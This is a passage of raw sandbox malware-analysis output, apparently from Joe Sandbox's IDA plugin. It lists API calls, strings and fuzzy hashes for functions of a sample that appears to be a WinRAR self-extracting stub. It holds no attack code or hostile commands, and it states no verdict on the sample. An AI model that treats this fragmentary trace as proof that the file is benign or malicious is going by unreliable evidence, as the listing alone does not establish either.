                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0059BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 0059BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,005B35F4), ref: 0059BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0059BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0059BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0059BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059BE68
                                                                                                                    • _wcslen.LIBCMT ref: 0059BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 0059BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0059BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0059BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0059BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0059BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0059BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,005CA472), ref: 0059BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0059C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0059C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0059C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0059C1D9
                                                                                                                      • Part of subcall function 0059C73F: __EH_prolog.LIBCMT ref: 0059C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0059C1FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<Y$STARTDLG$^Y$__tmp_rar_sfx_access_check_%u$hY$winrarsfxmappingfile.tmp$Q[
                                                                                                                    • API String ID: 3829768659-3505432909
                                                                                                                    • Opcode ID: 9b5e1ec03f279e2729a5f3a5a873895ffa15a556b623346c959590a037acb9c9
                                                                                                                    • Instruction ID: 8793e6e25def3b9247edee7a6cc1d41670b89bdfd32e1a996d094024ef645aac
                                                                                                                    • Opcode Fuzzy Hash: 9b5e1ec03f279e2729a5f3a5a873895ffa15a556b623346c959590a037acb9c9
                                                                                                                    • Instruction Fuzzy Hash: 6742C170944249AEFF25ABA0AD8EFBE3F6CBB61700F040055F545B60E2DB745E48EB21

                                                                                                                    Control-flow Graph
                                                                                                                    [Graph for function 00590863 (legend: Executed / Not Executed). Calls on the graph: GetModuleHandleW, GetProcAddress, GetModuleFileNameW, CreateFileW, SetFilePointer, ReadFile, CloseHandle, CompareStringW, GetFileAttributesW, AllocConsole, GetCurrentProcessId, AttachConsole, GetStdHandle, WriteConsoleW, Sleep, FreeConsole, ExitProcess.]
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0059087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0059088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005908BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00590B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00590B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00590B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<[,00000000), ref: 00590BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00590C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00590C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<[,?,00000000,?,00000800), ref: 00590C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<[,00000800,?,00000000,?,00000800), ref: 00590C9C
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=[,00000800), ref: 00590CD8
                                                                                                                      • Part of subcall function 0059081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                      • Part of subcall function 0059081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    • _swprintf.LIBCMT ref: 00590D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00590D96
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00590D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00590DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00590DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00590DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00590DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00590DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00590DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00590DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00590DF5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: (=[$,<[$,@[$0?[$0A[$4B[$8>[$D=[$DXGIDebug.dll$H?[$H@[$HA[$P>[$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=[$`@[$d?[$dA[$dwmapi.dll$h=[$h>[$kernel32$uxtheme.dll$|<[$|?[$|@[$<[$>[$?[$@[$A[
                                                                                                                    • API String ID: 1207345701-1314043
                                                                                                                    • Opcode ID: f79f3a642a5c77fddc9c21aa5ee99a3bbf1228fe38d718ba0c4ae2f7ab024776
                                                                                                                    • Instruction ID: 3181ef93ae4db4a1308d565585739910f9ced30a0c17f8c351beea7904dc1e2a
                                                                                                                    • Opcode Fuzzy Hash: f79f3a642a5c77fddc9c21aa5ee99a3bbf1228fe38d718ba0c4ae2f7ab024776
                                                                                                                    • Instruction Fuzzy Hash: 42D16EB1448385AFD730AF50884DADFBEECBF85704F504D1DF585AA191D7B0AA48CB62

                                                                                                                    Control-flow Graph
                                                                                                                    [Graph for function 0059C73F (legend: Executed / Not Executed). Calls on the graph: SetWindowTextW, GetDlgItem, SendMessageW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, MoveFileExW.]
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0059C744
                                                                                                                      • Part of subcall function 0059B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0059B3FB
                                                                                                                      • Part of subcall function 0059AF98: _wcschr.LIBVCRUNTIME ref: 0059B033
                                                                                                                    • _wcslen.LIBCMT ref: 0059CA0A
                                                                                                                    • _wcslen.LIBCMT ref: 0059CA13
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0059CA71
                                                                                                                    • _wcslen.LIBCMT ref: 0059CAB3
                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0059CBFB
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0059CC36
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0059CC46
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,005CA472), ref: 0059CC54
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0059CC7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                    • String ID: %s.%d.tmp$<br>$<Y$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$Y
                                                                                                                    • API String ID: 986293930-1034834540
                                                                                                                    • Opcode ID: c44097d9b89ec22bdb60cfcf6237e9e6dd65df80c924ff5f10a50206080ef51b
                                                                                                                    • Instruction ID: 19fc07b6f8e06a43297d7cb8f1f81dfcadb0861e92029923d092459f9c18d783
                                                                                                                    • Opcode Fuzzy Hash: c44097d9b89ec22bdb60cfcf6237e9e6dd65df80c924ff5f10a50206080ef51b
                                                                                                                    • Instruction Fuzzy Hash: 2EE16572900159AADF24EBA0DD89EEE7BBCBF45310F4045A6F649E7050EB749F848F60
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0058DA70
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0058DA91
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0058DAAC
                                                                                                                      • Part of subcall function 0058C29A: _wcslen.LIBCMT ref: 0058C2A2
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                      • Part of subcall function 00591B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0058BAE9,00000000,?,?,?,00010448), ref: 00591BA0
                                                                                                                    • _wcslen.LIBCMT ref: 0058DDE9
                                                                                                                    • __fprintf_l.LIBCMT ref: 0058DF1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9[
                                                                                                                    • API String ID: 557298264-1075897450

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                      • Part of subcall function 0059B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                      • Part of subcall function 0059B568: IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                      • Part of subcall function 0059B568: TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                      • Part of subcall function 0059B568: DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    • GetDlgItem.USER32(00000068,005DFCB8), ref: 0059D4E8
                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0059AF07,00000001,?,?,0059B7B9,005B506C,005DFCB8,005DFCB8,00001000,00000000,00000000), ref: 0059D510
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0059D51B
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005B35F4), ref: 0059D529
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D53F
                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0059D559
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D59D
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0059D5AB
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0059D5BA
                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0059D5E1
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005B43F4), ref: 0059D5F0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 3569833718-2967466578

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0059D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0059D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0059D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0059D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0059D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0059D9E1
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf$PDu<Y$hY$rY
                                                                                                                    • API String ID: 36480843-1771962381

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005A5695,005A5695,?,?,?,005AABAC,00000001,00000001,2DE85006), ref: 005AA9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005AABAC,00000001,00000001,2DE85006,?,?,?), ref: 005AAA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005AAB35
                                                                                                                    • __freea.LIBCMT ref: 005AAB42
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    • __freea.LIBCMT ref: 005AAB4B
                                                                                                                    • __freea.LIBCMT ref: 005AAB70
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,005A3C35,?,?,005E2088,00000000,?,005A3D60,00000004,InitializeCriticalSectionEx,005B6394,InitializeCriticalSectionEx,00000000), ref: 005A3C03
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                      • Part of subcall function 0059081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0059AC2F
                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0059AC66
                                                                                                                    • SHGetMalloc.SHELL32(005C8438), ref: 0059AC70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                                    • API String ID: 3498096277-3613677438

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00587760,?,00000005,?,00000011), ref: 0058995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00587760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0058996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00587760,?,00000005,?), ref: 005899A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00587760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005899AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00587760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005899F9
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                    • IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0059ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0059ABF9
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0059ABE9
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0059DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0059DC30
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00589795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 005897AD
                                                                                                                    • GetLastError.KERNEL32 ref: 005897DF
                                                                                                                    • GetLastError.KERNEL32 ref: 005897FE
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005A3F73,00000000,00000000,?,005AACDB,005A3F73,00000000,00000000,00000000,?,005AAED8,00000006,FlsSetValue), ref: 005AAD66
                                                                                                                    • GetLastError.KERNEL32(?,005AACDB,005A3F73,00000000,00000000,00000000,?,005AAED8,00000006,FlsSetValue,005B7970,FlsSetValue,00000000,00000364,?,005A98B7), ref: 005AAD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005AACDB,005A3F73,00000000,00000000,00000000,?,005AAED8,00000006,FlsSetValue,005B7970,FlsSetValue,00000000), ref: 005AAD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: ed29ef069781f3474c19a79ac3ca98eabe55cd1a97e04b40cd5f21f2b4dd233e
                                                                                                                    • Instruction ID: 5c0319c04a9df3b4ec1cef1eb3f6db9d069efb679adc45d16b10ad4e9456e27f
                                                                                                                    • Opcode Fuzzy Hash: ed29ef069781f3474c19a79ac3ca98eabe55cd1a97e04b40cd5f21f2b4dd233e
                                                                                                                    • Instruction Fuzzy Hash: 77017B36201236ABC7224B68EC48A5F7F98FF567A37140B20F887E7550D721E804C6E1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005A97E5: GetLastError.KERNEL32(?,005C1030,005A4674,005C1030,?,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A97E9
                                                                                                                      • Part of subcall function 005A97E5: _free.LIBCMT ref: 005A981C
                                                                                                                      • Part of subcall function 005A97E5: SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A985D
                                                                                                                      • Part of subcall function 005A97E5: _abort.LIBCMT ref: 005A9863
                                                                                                                      • Part of subcall function 005ABB4E: _abort.LIBCMT ref: 005ABB80
                                                                                                                      • Part of subcall function 005ABB4E: _free.LIBCMT ref: 005ABBB4
                                                                                                                      • Part of subcall function 005AB7BB: GetOEMCP.KERNEL32(00000000,?,?,005ABA44,?), ref: 005AB7E6
                                                                                                                    • _free.LIBCMT ref: 005ABA9F
                                                                                                                    • _free.LIBCMT ref: 005ABAD5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID: p[
                                                                                                                    • API String ID: 2991157371-3527190296
                                                                                                                    • Opcode ID: 6d1f5aedee82e3811e6d13a62e0aa27f6f2178edbfe20dc32c8fb5d16c73f571
                                                                                                                    • Instruction ID: 44fb1df9490e1d0c42be83894ef99259b040887a70dca50c23df00f4518cc306
                                                                                                                    • Opcode Fuzzy Hash: 6d1f5aedee82e3811e6d13a62e0aa27f6f2178edbfe20dc32c8fb5d16c73f571
                                                                                                                    • Instruction Fuzzy Hash: 4231BE71904209AFEB10DF68D445BAD7FF5FF82320F254199E5045B2A3EB729D44DB90
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E51F
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
